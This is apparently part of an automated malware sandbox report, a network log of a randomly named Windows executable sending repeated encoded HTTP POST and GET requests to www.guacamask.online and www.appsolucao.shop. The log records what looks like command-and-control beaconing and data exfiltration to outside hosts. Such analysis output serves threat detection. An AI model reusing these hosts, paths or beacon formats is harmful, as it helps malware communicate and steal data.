                                                                                                            Data Raw: 39 50 5a 74 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 73 6c 5a 5a 76 78 61 2f 31 43 73 49 62 2b 42 72 30 2b 4e 56 37 67 77 64 74 71 4f 2f 42 4a 57 59 48 4b 49 4e 30 62 47 56 77 62 36 62 62 34 2b 62 75 34 46 55 2b 5a 50 7a 6f 4c 39 7a 34 70 4a 6a 4b 71 75 35 76 31 46 72 41 55 6c 35 69 73 79 43 4b 58 38 50 75 41 48 31 39 39 53 55 49 4e 72 41 42 37 39 61 50 45 56 53 43 78 6f 62 79 52 4c 32 38 37 4e 37 4c 7a 78 41 2b 6e 42 36 48 50 53 7a 4d 2f 64 56 69 4d 77 4f 31 33 56 4a 52 71 51 4e 2f 42 41 71 2b 74 69 6f 2b 61 57 74 42 6c 57 61 6e 4e 39 34 78 64 55 59 30 79 2f 52 64 63 54 38 4c 79 6d 75 5a 47 37 6a 37 43 78 6f 52 42 45 79
                                                                                                            Data Ascii: 9PZt=cwNQIXCQp2K9slZZvxa/1CsIb+Br0+NV7gwdtqO/BJWYHKIN0bGVwb6bb4+bu4FU+ZPzoL9z4pJjKqu5v1FrAUl5isyCKX8PuAH199SUINrAB79aPEVSCxobyRL287N7LzxA+nB6HPSzM/dViMwO13VJRqQN/BAq+tio+aWtBlWanN94xdUY0y/RdcT8LymuZG7j7CxoRBEy


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.650019208.91.197.27801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:04.236709118 CET777OUTPOST /v2ut/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.guacamask.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.guacamask.online
                                                                                                            Referer: http://www.guacamask.online/v2ut/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 75 47 52 5a 70 53 79 2f 2b 43 73 4c 48 4f 42 72 39 65 4d 63 37 67 4d 64 74 6f 6a 6b 41 39 36 59 4a 49 41 4e 33 61 47 56 6a 72 36 62 51 59 2b 61 71 34 46 62 2b 5a 43 4d 6f 4f 64 7a 34 70 64 6a 4b 6f 47 35 76 45 46 30 41 45 6c 42 76 4d 79 4d 4a 6e 38 50 75 41 48 31 39 35 37 4a 49 4d 50 41 42 4f 74 61 4e 6c 56 52 42 78 6f 63 6c 68 4c 32 34 37 4e 2f 4c 7a 78 69 2b 69 5a 55 48 4e 36 7a 4d 2b 74 56 6c 66 6f 4e 69 48 56 4c 63 4b 52 6b 79 44 67 6b 79 64 37 66 36 49 54 49 52 6b 43 39 6d 37 67 69 74 75 55 37 6d 69 66 54 64 65 4c 4f 4c 53 6d 45 62 47 44 6a 70 56 39 50 65 31 68 52 30 4c 32 39 72 59 61 58 33 44 41 42 54 67 57 34 62 38 76 33 37 51 3d 3d
                                                                                                            Data Ascii: 9PZt=cwNQIXCQp2K9uGRZpSy/+CsLHOBr9eMc7gMdtojkA96YJIAN3aGVjr6bQY+aq4Fb+ZCMoOdz4pdjKoG5vEF0AElBvMyMJn8PuAH1957JIMPABOtaNlVRBxoclhL247N/Lzxi+iZUHN6zM+tVlfoNiHVLcKRkyDgkyd7f6ITIRkC9m7gituU7mifTdeLOLSmEbGDjpV9Pe1hR0L29rYaX3DABTgW4b8v37Q==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.650020208.91.197.27801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:06.783391953 CET1790OUTPOST /v2ut/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.guacamask.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.guacamask.online
                                                                                                            Referer: http://www.guacamask.online/v2ut/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 63 77 4e 51 49 58 43 51 70 32 4b 39 75 47 52 5a 70 53 79 2f 2b 43 73 4c 48 4f 42 72 39 65 4d 63 37 67 4d 64 74 6f 6a 6b 41 39 79 59 4a 36 34 4e 30 39 53 56 67 72 36 62 54 59 2b 66 71 34 46 38 2b 5a 4c 46 6f 4f 5a 6a 34 71 6c 6a 4d 4c 2b 35 70 77 70 30 4c 45 6c 42 77 63 79 4e 4b 58 38 47 75 47 6e 35 39 39 66 4a 49 4d 50 41 42 4a 56 61 44 6b 56 52 48 78 6f 62 79 52 4c 71 38 37 4e 62 4c 7a 6f 64 2b 6a 4a 71 48 39 61 7a 4e 65 39 56 67 74 77 4e 2b 58 56 7a 66 4b 52 38 79 44 74 6d 79 64 57 6b 36 4a 32 74 52 6d 65 39 72 74 39 2f 39 74 59 55 77 52 76 46 64 50 76 4f 54 55 4f 78 57 32 7a 7a 75 54 4e 37 52 6e 39 34 31 62 69 69 6a 6f 37 33 31 67 4d 4d 58 6d 44 78 56 49 71 65 70 38 4c 37 6e 2b 57 6c 53 35 59 6f 62 6f 54 41 50 65 57 42 6d 57 7a 33 4b 73 56 50 6b 71 4e 78 44 6f 39 57 70 6b 65 73 73 4b 47 4c 77 52 6d 78 6e 47 47 6d 47 70 6d 79 70 6c 48 52 63 66 53 4f 6b 59 4b 57 47 58 2f 43 55 67 42 38 4e 59 74 30 42 59 42 46 6d 66 37 41 31 38 7a 46 69 46 58 43 6a 72 74 58 47 72 6c 43 35 46 79 35 50 [TRUNCATED]
                                                                                                            Data Ascii: 9PZt=cwNQIXCQp2K9uGRZpSy/+CsLHOBr9eMc7gMdtojkA9yYJ64N09SVgr6bTY+fq4F8+ZLFoOZj4qljML+5pwp0LElBwcyNKX8GuGn599fJIMPABJVaDkVRHxobyRLq87NbLzod+jJqH9azNe9VgtwN+XVzfKR8yDtmydWk6J2tRme9rt9/9tYUwRvFdPvOTUOxW2zzuTN7Rn941biijo731gMMXmDxVIqep8L7n+WlS5YoboTAPeWBmWz3KsVPkqNxDo9WpkessKGLwRmxnGGmGpmyplHRcfSOkYKWGX/CUgB8NYt0BYBFmf7A18zFiFXCjrtXGrlC5Fy5PIXxryW8dG5jbSiPDkxfNlUZJrTEF7e0KAXkVj7Jw534dUMgNtAIkeTPF/Cm6vUHXmOIP063UHojzb9fZ4yODBeT4vGe9zzB9qxksQxYiZVWf/F8lhyA1A4RDxhOkfcnrO/oOTQvSsK+8mbsBjcSh+LmIYQQH5fzkHPt1Oyu6RKZLZJJQRYU9eOnwn+F+DZgXFZqRmk0wTIuhgIlmHbdB19duXr9IX54uXQINKIQxatEeXi6vg5tdMk7LCRyDzzavH/e+X+f/csB4+yAMtcgSGIWr7t1wUKBNCxWhBtfRD6RWJxuDvrFQhfKGVt69R/OBxRnykrOyeMBTFmAwNsGSjJNqQtisA6PC/3J/rD8wl7YMx6Nsh2p8NovXBtRJ5CZXM+yL2E+XXoK9IrJ2d+Dj9pourpZcfXj0apNFJEvR8g9n6BvjDLTKcU+k8B3rlOCWHP+cmkcWkVnuug70AjdkxKbkD3HLEXeKzYCVypkdpZgUkIgvOOKMexwquQYgYRjqY5TJ/TNFSpq5P9yVgKQajMS0n1Zm5JGDrWUvOczOu3tY4CyR0bjpcvwUcfOU0U/YWbImKbYRyvjjwYoHBdfbFyxCvc5zOnFLXqRRrA3dctwEFszQ48r/RtAaoMl6tTn18grDsgceaqI7dNEHLdp+ORZlcNTjWgWOSb [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.650021208.91.197.27801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:09.325422049 CET488OUTGET /v2ut/?I8A=fF8h_X3X0TB&9PZt=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLIzhxo/qMOX8MgFiq9bThHJniXb4lO04jER0alxiz9odaEmB/xSI= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.guacamask.online
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:27:10.240576029 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:27:09 GMT
                                                                                                            Server: Apache
                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                            Set-Cookie: vsid=903vr484111629531572869; expires=Thu, 10-Jan-2030 03:27:09 GMT; Max-Age=157680000; path=/; domain=www.guacamask.online; HttpOnly
                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_m3BWUuV8QqfjGPwOoEbl3hQiv91G4Tl1zMgkIWlYF4TVlVG9dHogQXer4apmNj+0sEMxsTZL/GxK5o/QjUDiOw==
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Connection: close
                                                                                                            Data Raw: 37 62 66 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22
                                                                                                            Data Ascii: 7bfb<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"
                                                                                                            Jan 11, 2025 04:27:10.240612030 CET1236INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69
                                                                                                            Data Ascii: > <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in
                                                                                                            Jan 11, 2025 04:27:10.240628958 CET1236INData Raw: 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22
                                                                                                            Data Ascii: on(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages
                                                                                                            Jan 11, 2025 04:27:10.240896940 CET401INData Raw: 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67
                                                                                                            Data Ascii: ages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.s
                                                                                                            Jan 11, 2025 04:27:10.240912914 CET1236INData Raw: 72 28 30 2c 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 29 7d 72 65 74 75 72 6e 20 77 7d 76 61 72 20 6b 3d 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 68 29 3f 68 2e 63 6d 70 5f 70 72 6f 74 6f 3a 22 68 74 74 70 73 3a 22 3b 69 66 28 6b 21 3d 22
                                                                                                            Data Ascii: r(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:location.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab","1");var c=x("cmpdesi
                                                                                                            Jan 11, 2025 04:27:10.241202116 CET224INData Raw: 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 76 61 72 20 6d 3d 22 6a 73
                                                                                                            Data Ascii: cript")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage"
                                                                                                            Jan 11, 2025 04:27:10.241218090 CET1236INData Raw: 20 69 6e 20 68 3f 68 2e 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 3a 22 22 29 3b 69 66 28 61 3d 3d 22 31 22 29 7b 6d 3d 22 69 6e 73 74 72 75 6d 65 6e 74 65 64 22 3b 70 3d 22 22 7d 76 61 72 20 6a 3d 75 2e 63 72 65 61 74 65 45 6c 65 6d 65
                                                                                                            Data Ascii: in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u
                                                                                                            Jan 11, 2025 04:27:10.241235018 CET1236INData Raw: 22 29 21 3d 2d 31 29 7b 76 61 72 20 63 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 29 7d 65 6c 73 65 7b 76 61 72 20 63 3d 62 2e 73 75 62 73 74 72 28 62 2e 69
                                                                                                            Data Ascii: ")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;_
                                                                                                            Jan 11, 2025 04:27:10.241250992 CET1236INData Raw: 7c 5b 5d 3b 69 66 28 21 28 22 6c 61 73 74 49 64 22 20 69 6e 20 5f 5f 67 70 70 29 29 7b 5f 5f 67 70 70 2e 6c 61 73 74 49 64 3d 30 7d 5f 5f 67 70 70 2e 6c 61 73 74 49 64 2b 2b 3b 76 61 72 20 63 3d 5f 5f 67 70 70 2e 6c 61 73 74 49 64 3b 5f 5f 67 70
                                                                                                            Data Ascii: |[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h
                                                                                                            Jan 11, 2025 04:27:10.241563082 CET516INData Raw: 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 29 7d 69 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22
                                                                                                            Data Ascii: llId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,cal
                                                                                                            Jan 11, 2025 04:27:10.245713949 CET1236INData Raw: 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 2c 22 70 61 72 61 6d 65 74 65 72 22 20 69 6e 20 62 3f 62 2e 70 61 72 61 6d 65 74 65 72 3a 6e 75 6c 6c 2c 22 76 65 72 73 69 6f 6e 22 20 69 6e 20 62 3f 62 2e 76 65 72 73 69 6f 6e 3a
                                                                                                            Data Ascii: N.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.65002284.32.84.32801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:15.567838907 CET750OUTPOST /qt4m/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.appsolucao.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.appsolucao.shop
                                                                                                            Referer: http://www.appsolucao.shop/qt4m/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 79 62 34 51 47 4f 63 44 6e 57 41 4c 58 47 67 6f 78 67 2f 42 37 54 6e 64 6d 4d 6b 6f 4a 5a 68 44 6a 68 31 63 67 52 4c 6b 65 6e 72 33 63 4a 36 48 6a 6c 48 6e 76 39 61 53 6e 69 6c 74 59 52 4b 41 78 5a 6f 57 47 65 65 4a 72 38 4b 33 6e 2f 6b 48 41 4a 6c 55 41 53 65 74 35 6d 31 6a 46 4e 70 6f 39 6e 71 4e 49 6a 2b 73 55 39 72 63 75 45 4a 57 48 63 6d 4c 54 44 61 44 70 56 34 57 5a 67 6e 35 68 72 63 4d 2f 54 6f 39 41 5a 2f 4f 59 76 52 57 4c 30 4f 6e 56 58 73 67 69 33 71 73 69 4f 50 6c 55 68 44 52 63 54 59 61 5a 43 44 62 45 6d 53 43 35 6c 32 41 2b 74 30 65 61 50 74 67 6c 75 57 42 59 58 64 38 44 4d 33 4c 33 51 71 50
                                                                                                            Data Ascii: 9PZt=yb4QGOcDnWALXGgoxg/B7TndmMkoJZhDjh1cgRLkenr3cJ6HjlHnv9aSniltYRKAxZoWGeeJr8K3n/kHAJlUASet5m1jFNpo9nqNIj+sU9rcuEJWHcmLTDaDpV4WZgn5hrcM/To9AZ/OYvRWL0OnVXsgi3qsiOPlUhDRcTYaZCDbEmSC5l2A+t0eaPtgluWBYXd8DM3L3QqP


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.65002384.32.84.32801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:18.111947060 CET774OUTPOST /qt4m/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.appsolucao.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.appsolucao.shop
                                                                                                            Referer: http://www.appsolucao.shop/qt4m/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 79 62 34 51 47 4f 63 44 6e 57 41 4c 58 6e 51 6f 69 54 58 42 35 7a 6e 63 34 38 6b 6f 51 4a 68 50 6a 68 4a 63 67 56 36 6a 65 52 54 33 62 73 65 48 69 67 37 6e 73 39 61 53 76 43 6c 6b 58 78 4c 4d 78 5a 6c 6a 47 62 2b 4a 72 38 32 33 6e 2b 30 48 63 71 39 4c 61 69 65 76 2f 6d 31 68 59 39 70 6f 39 6e 71 4e 49 6a 36 56 55 35 48 63 76 33 52 57 47 2b 65 49 51 44 61 41 71 56 34 57 64 67 6d 77 68 72 63 69 2f 57 49 58 41 61 48 4f 59 74 5a 57 4c 6d 6d 67 43 48 73 71 76 58 72 41 70 4e 36 78 54 43 4b 6f 53 56 59 6d 61 51 6e 45 42 51 50 59 6c 57 32 6a 73 39 55 63 61 4e 31 53 6c 4f 57 72 61 58 6c 38 52 62 37 73 34 6b 50 73 57 43 36 48 2b 4f 52 72 50 51 55 5a 73 48 72 56 68 33 57 7a 6a 41 3d 3d
                                                                                                            Data Ascii: 9PZt=yb4QGOcDnWALXnQoiTXB5znc48koQJhPjhJcgV6jeRT3bseHig7ns9aSvClkXxLMxZljGb+Jr823n+0Hcq9Laiev/m1hY9po9nqNIj6VU5Hcv3RWG+eIQDaAqV4Wdgmwhrci/WIXAaHOYtZWLmmgCHsqvXrApN6xTCKoSVYmaQnEBQPYlW2js9UcaN1SlOWraXl8Rb7s4kPsWC6H+ORrPQUZsHrVh3WzjA==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.65002484.32.84.32801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:27:20.658957005 CET1787OUTPOST /qt4m/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.appsolucao.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.appsolucao.shop
                                                                                                            Referer: http://www.appsolucao.shop/qt4m/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 79 62 34 51 47 4f 63 44 6e 57 41 4c 58 6e 51 6f 69 54 58 42 35 7a 6e 63 34 38 6b 6f 51 4a 68 50 6a 68 4a 63 67 56 36 6a 65 53 7a 33 62 61 43 48 6a 44 54 6e 74 39 61 53 77 79 6c 68 58 78 4b 57 78 59 4e 34 47 62 37 38 72 35 79 33 6f 38 73 48 51 50 4a 4c 50 79 65 76 79 47 31 69 46 4e 70 78 39 6e 36 4a 49 6a 4b 56 55 35 48 63 76 32 68 57 42 73 6d 49 57 44 61 44 70 56 34 53 5a 67 6d 63 68 72 46 66 2f 57 38 74 63 37 6e 4f 59 4e 70 57 47 7a 36 67 42 6e 73 6b 73 58 72 59 70 4e 6d 48 54 43 6e 58 53 56 45 4d 61 54 37 45 41 6e 6d 2f 68 6d 75 4c 37 66 49 6a 4d 65 4e 47 74 59 66 5a 64 6b 35 30 56 62 6a 65 78 56 62 55 57 31 57 41 71 64 6b 7a 66 41 41 6a 6f 52 36 77 73 46 44 2f 2b 74 68 49 35 2f 67 79 76 4f 53 6d 73 6d 57 49 65 30 65 6c 61 6e 68 52 74 78 64 37 68 2f 4c 4e 5a 6e 4b 34 55 52 65 78 34 59 4b 67 6e 38 70 33 65 51 62 44 6c 6f 33 45 36 74 4f 4f 45 2f 57 30 46 56 71 31 77 79 7a 2b 38 7a 42 71 42 62 34 71 4d 77 53 57 51 59 47 6b 6a 54 4f 4c 6f 6c 30 79 49 6d 51 64 4a 31 76 65 47 50 67 53 39 [TRUNCATED]
